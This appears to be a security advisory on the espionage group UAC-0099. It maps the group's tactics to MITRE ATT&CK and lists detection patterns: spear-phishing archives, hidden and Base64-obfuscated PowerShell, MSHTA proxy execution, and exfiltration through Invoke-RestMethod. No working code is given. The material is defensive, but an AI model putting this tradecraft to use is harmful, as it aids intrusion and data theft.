Summary:
UAC-0099, a cyber-espionage threat actor linked to advanced persistent threats (APTs), has been identified targeting organizations with sophisticated campaigns. According to a recent analysis by SOC Prime, UAC-0099 employs a combination of spear-phishing emails, malicious attachments, and advanced malware to infiltrate targeted networks. The group focuses on gathering intelligence from government, military, and critical infrastructure sectors.

The attacks are characterized by their use of custom malware and well-crafted social engineering tactics. The malware is designed to persist in the victim’s system while exfiltrating sensitive data. UAC-0099’s campaigns highlight their ability to adapt their techniques, targeting vulnerabilities in both IT and OT environments to achieve their espionage objectives.

Security Officer Comments:
The ongoing campaigns by UAC-0099 demonstrate the growing sophistication of cyber-espionage groups and their ability to craft targeted attacks that exploit both human and technical vulnerabilities. The group’s focus on critical infrastructure and government sectors is particularly concerning, as breaches in these areas could have far-reaching consequences, including disruptions to national security.

Organizations must remain vigilant by adopting proactive defense strategies. This includes training employees to recognize phishing attempts, deploying advanced detection tools, and ensuring that security measures are tailored to defend against both traditional and emerging threats. The detection strategies highlighted by SOC Prime provide valuable insights into identifying and mitigating UAC-0099’s activity.

MITRE ATTACK:
Initial Access:

• Phishing: Spearphishing Attachment (T1566.001): Involves the use of email attachments to deliver malicious payloads.
• Execution from ZIP Archive [7zip]: Executed via process creation.
• Execution from RAR Archive [WinRAR]: Executed via process creation.

Execution:

• Scheduled Task/Job (T1053):Using scheduled tasks for execution.
  • Schtasks points to suspicious directories, binaries, or scripts (via cmdline).
• Exploitation for Client Execution (T1203): Using client-side exploitation methods.
• User Execution: Malicious Link (T1204.001): Includes possible malicious LNK files with double extensions (via cmdline).
• User Execution: Malicious File (T1204.002): Malicious file execution methods from ZIP archives [7zip] or RAR archives [WinRAR] (via process creation).
• Command and Scripting Interpreter: PowerShell (T1059.001):
  • PowerShell commands used for downloading or uploading files (via cmdline).
  • Hidden PowerShell command lines for execution.
  • Suspicious usage of Invoke-RestMethod (via PowerShell).
  • .NET classes/methods called from PowerShell command lines (via process creation).
  • Detection of Base64-encoded malicious content (via cmdline).
  • Strings indicative of suspicious PowerShell activity (via cmdline or PowerShell).
• Command and Scripting Interpreter: Windows Command Shell (T1059.003):
  • Usage of environment variables in command line arguments.
  • Suspicious PowerShell strings (via cmdline).

Defense Evasion:

• Obfuscated Files or Information (T1027):
  • Indicators of Base64-encoded malicious content (via cmdline).
  • Potential PowerShell obfuscation tactics.
• Command Obfuscation (T1027.010): Indicators of obfuscation in PowerShell commands (via cmdline).
• System Binary Proxy Execution (T1218):
  • Detection of suspicious LOLBAS (Living Off the Land Binaries and Scripts) MSHTA commands for defense evasion (via process creation).
• Hide Artifacts (T1564):
  • Presence of suspicious files or execution from public user profiles (via file_event or process creation).
• Hidden Window (T1564.003): Indicators of hidden PowerShell command lines used for execution (via cmdline).

Command and Control:

• Ingress Tool Transfer (T1105): Transferring files using PowerShell download/upload methods (via cmdline).

Exfiltration:

• Automated Exfiltration (T1020): Uploading files via PowerShell methods or suspicious use of Invoke-RestMethod (via cmdline or PowerShell).

Suggested Corrections:
Organizations should prioritize enhancing email security by deploying advanced filtering solutions to block spear-phishing attempts and malicious attachments. Regular employee awareness training is essential to help staff recognize phishing tactics and suspicious content. Organizations should also implement advanced threat detection tools to monitor for anomalies and indicators of compromise (IoCs) linked to UAC-0099.

Link(s):
https://socprime.com/blog/uac-0099-cyber-espionage-attacks-detection/